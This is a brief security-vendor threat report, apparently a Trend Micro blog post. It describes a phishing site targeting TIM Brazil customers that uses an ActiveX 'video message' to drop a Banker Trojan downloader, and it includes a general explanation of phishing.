Just recently, Trend Micro discovered an FTP server in Uruguay that hosts a phishing Web site that targets Telecom Italia Mobile (TIM) customers, one of the largest mobile phone companies in Brazil.
The server’s IP address indicates that it may be affiliated with Russian or Ukrainian cyber criminals who have previously been affiliated with RBN, or the Russian Business Network. RBN was made notorious for it’s “bullet-proof” hosting facilities which have been linked to illegal activities such as child pornography, phishing, spam, and malware distribution.
Using an INDEX.HTML file, this phishing site has an ActiveX control that invites a user to view a video message purportedly from TIM Brazil. When accessed, it attempts to insert a malicious code on the client system and then send phishing messages to the affected user. This file changes daily and points to a new false URL that is sent via email to all those who fell victim to the fraudulent Web site.
Phishing is a technique used to trick users into divulging personal information (such as social security numbers, ATM PIN, and credit card numbers) through email or dubious Web sites. Perpetrators trick gullible users to send them private or personal information. To do this, they forge the Web site or an email of a legitimate company. These Web sites or email messages usually ask for information about the recipient. Alterations on the code of these bogus Web pages or email messages result in the information being redirected to the cyber criminals. When the user is tricked into divulging information, we say that (s)he has become a victim of a “phishing attack.”
The activeX is already detected by Trend Micro as POSSIBLE_MLWR- 1. The malicious URL, which hides the source of the downloadable file through an obfuscated code script and resolves to downloading a Banker Trojan downloader, win.exe, from a host located in Brazil which is already blocked by our URL filtering services.